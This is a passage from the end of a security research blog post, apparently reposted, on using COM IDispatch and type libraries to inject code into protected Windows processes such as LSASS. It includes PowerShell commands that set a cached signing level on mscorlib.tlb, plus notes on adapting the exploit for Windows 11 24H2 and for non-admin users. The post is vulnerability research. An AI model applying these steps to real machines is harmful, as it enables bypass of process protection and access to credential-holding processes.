We could try and find a previous version of the type library file which is both validly signed, and is packaged in a PE file, however, I'd rather not do that. Of course there's almost certainly another COM object we could load rather than .NET which might give us arbitrary code execution but I'd set my heart on this approach. In the end the solution was simpler than I expected, for some reason the 32 bit version of the type library file (i.e. in Framework rather than Framework64) is packed in a DLL, and we can set a cached signing level on it.

PS> $path = "C:\windows\Microsoft.NET\Framework\v4.0.30319\mscorlib.tlb"

PS> Format-HexDump $path -Length 64 -ShowAll

          00 01 02 03 04 05 06 07 08 09 0A 0B 0C 0D 0E 0F  - 0123456789ABCDEF

-----------------------------------------------------------------------------

00000000: 4D 5A 90 00 03 00 00 00 04 00 00 00 FF FF 00 00  - MZ..............

00000010: B8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00  - ........@.......

00000020: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  - ................

00000030: 00 00 00 00 00 00 00 00 00 00 00 00 B8 00 00 00  - ................

PS> Set-NtCachedSigningLevel $path -Flags 0x804 -SigningLevel 12 -Win32Path

PS> Get-NtCachedSigningLevel $path -Win32Path

Flags               : TrustedSignature

SigningLevel        : Windows

Thumbprint          : B9590CE5B1B3F377EAA6F455574C977919BB785F12A444BEB2...

ThumbprintBytes     : {185, 89, 12, 229...}

ThumbprintAlgorithm : Sha256

Thus to exploit on Windows 11 24H2 we can swap the type library registration path from the 64 bit version to the 32 bit version and rerun the exploit. The VerifyTrust function will automatically set the cached signing level for us so we don't need to do anything to make it work. Even though it's technically a different version of the type library, it doesn't make any difference for our use case and the stub generator code doesn't care.

Conclusions

I discussed in this blog post an interesting type of bug class on Windows, although it is applicable to any similar object-orientated remoting cross process or remoting protocol. It shows how you can get a COM object trapped in a more privileged process by exploiting a feature of OLE Automation, specifically the IDispatch interface and type libraries.

While I wasn't able to demonstrate a privilege escalation, I showed how you can use the IDispatch interface exposed by the WaaSRemediationAgent class to inject code into a PPL-Windows process. While this isn't the highest possible protection level it allows access to the majority of processes running protected including LSASS. We saw that Microsoft has done some work to try and mitigate existing attacks such as type library type-confusions, but in our case this mitigation shouldn't have blocked the load as we didn't need to change the type library itself. While the attack required admin privilege, the general technique does not. You could modify the local user's registration for COM and .NET to do the attack as a normal user to inject into a PPL if you can find a suitable COM server exposing IDispatch.

Kategorie: Hacking & Security
Syndikovat obsah